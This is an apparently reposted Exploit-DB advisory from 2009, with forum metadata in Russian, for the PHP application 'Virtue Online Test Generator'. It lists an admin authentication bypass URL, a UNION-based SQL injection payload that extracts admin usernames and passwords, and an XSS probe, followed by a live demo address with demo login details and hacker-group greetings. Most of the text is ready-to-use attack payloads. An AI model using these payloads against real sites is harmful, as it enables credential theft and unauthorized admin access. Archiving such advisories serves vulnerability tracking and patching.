- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9022
- Проверка EDB
-
- Пройдено
- Автор
- HXH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2393 cve-2009-2392 cve-2009-2391
- Дата публикации
- 2009-06-26
Код:
+===================================================================================+
| |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
| |
+===================================================================================+
| |
| Author.: HxH |
| Contact: HxH[at]live[dot]at |
| |
+===================================================================================+
| |
| Script.: Virtue Online Test Generator |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
| |
+-----------------------------------------------------------------------------------+
| |
| Exploit: After user login |
| |
| [+] Auth Bypass |
| |
| http://[website]/[script]/admin/index.php |
| |
| [+] SQLi |
| |
| http://[website]/[script]/text.php?tid=[SQL] |
| |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
| |
| [+] XSS |
| |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
| |
+-----------------------------------------------------------------------------------+
| |
| Demo...: http://www.virtuenetz.com/exam |
| Usrinfo: E-mail:[email protected] ~ Pass:demo |
| |
+===================================================================================+
| |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
| |
+===================================================================================+
# milw0rm.com [2009-06-26]- Источник
- www.exploit-db.com
